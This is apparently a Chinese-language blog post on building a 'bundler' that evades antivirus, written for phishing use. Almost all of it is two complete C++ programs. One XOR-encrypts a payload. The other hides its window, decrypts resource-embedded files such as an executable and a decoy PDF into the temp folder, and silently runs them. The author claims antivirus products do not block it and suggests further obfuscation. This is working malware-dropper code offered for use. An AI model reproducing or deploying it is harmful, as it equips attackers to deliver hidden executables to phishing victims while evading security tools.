浅谈捆绑免杀技术

前记

看到奇安信某篇钓鱼捆绑技术的文章后得到启发，于是开始学习探索

浅谈原理

将exe和pdf或者其他格式的文件写到资源节中，执行捆绑文件的时候动态获取并解密资源节的内容保存到磁盘的tmp目录，最后执行保存到磁盘的文件即可

代码汇总

加密文件

#include<windows.h>  
#include <iostream>  
using namespace std;
int main(int argc, char* argv[])
{
    int r = 100;
    HANDLE file = CreateFileA(argv[1], GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);
    DWORD64 size = GetFileSize(file, NULL);
    char* bytes =(char*) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, size);
    ReadFile(file, bytes, size, NULL, NULL);
    HANDLE file2 = CreateFileA("sec.txt", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    LPVOID res = bytes;
    int b;
    DWORD64 c = size;
    srand(r);
    while (c--) {
        b = rand() % 255 + 1;//1-255
        *bytes^= b;
        bytes++;
    }
    if (!WriteFile(file2, res, size, NULL, NULL)) {
        std::cerr << "Error writing to file" << std::endl;
        DWORD aaa=GetLastError();
        return 1;
    }
    CloseHandle(file2);
    CloseHandle(file);
	return 0;
}

捆绑文件

#include <iostream>
#include <windows.h>

int r=100;
using namespace std;
static int num = 0;

void getreal(char *dest,char *src, DWORD num)
{
    int b;
    srand(r);
    while (num--) {
        b = rand() % 255 + 1;//1-255
        *dest++ = *src++^b;
    }
}
void HideWindow() {
    HWND hwnd = GetForegroundWindow();
    if (hwnd) {
        ShowWindow(hwnd, SW_HIDE);
    }
}
void EnumTypesFunc(HMODULE hModule, LPTSTR lpType, LPTSTR lParam) {
    num++;
    DWORD dwNum = WideCharToMultiByte(CP_OEMCP, NULL, lpType, -1, NULL, 0, NULL, FALSE);
    char* fileType =new char[dwNum];
    WideCharToMultiByte(CP_OEMCP, NULL, lpType, -1, fileType, dwNum, NULL, FALSE);

    CHAR PathFileName[MAX_PATH] = { 0 };
    CHAR FileName[MAX_PATH] = { 0 };

    HRSRC Resource = FindResourceA(NULL, MAKEINTRESOURCEA(100 + num), fileType);
    HGLOBAL ResourceGlobal = LoadResource(NULL, Resource);
    DWORD FileSize = SizeofResource(NULL, Resource);
    LPVOID PFILE = LockResource(ResourceGlobal);
    GetModuleFileNameA(NULL, PathFileName, MAX_PATH);

    strcpy_s(FileName, strrchr(PathFileName, '\\') + 1);
    string FileNameFinal = FileName;
    FileNameFinal.replace(FileNameFinal.rfind('.'), 4, "." + string(fileType));

    CHAR czTempPath[MAX_PATH] = { 0 };
    GetTempPathA(MAX_PATH, czTempPath);
    FileNameFinal = czTempPath + FileNameFinal;

    strcpy_s(FileName, FileNameFinal.c_str());

    HANDLE FILE = CreateFileA(FileName, FILE_ALL_ACCESS, 0, NULL, CREATE_ALWAYS, 0, NULL);
    DWORD dwSize;
    char *real= new char[FileSize];
    getreal(real,(char *)PFILE,FileSize);
    WriteFile(FILE, real, FileSize, &dwSize, NULL);
    CloseHandle(FILE);

    Sleep(500);
    SHELLEXECUTEINFOA shellexecute = { 0 };
    shellexecute.cbSize = sizeof(shellexecute);
    shellexecute.lpFile = FileName;
    shellexecute.nShow = SW_SHOW;
    ShellExecuteExA(&shellexecute);
}

int main(int argc, char* argv[])
{
    HideWindow();
    EnumResourceTypes(NULL,
        (ENUMRESTYPEPROC)EnumTypesFunc,
        0);
}

因为对资源节内容进行了加密，所以这里资源节里完全没有PE特征

后记

由于解析文件后缀依靠填写的文件真实格式，因此可能被杀软检测到资源节的exe关键字，建议宏定义或者加密处理（懒得改代码了）。经过测试杀软均不拦截且正常运行，当然如果exe文件落地后报毒则和捆绑本身操作无关

reference

https://forum.butian.net/share/1778
https://github.com/testxxxzzz/Bundler-bypass/blob/main/Bundler_C/main.cpp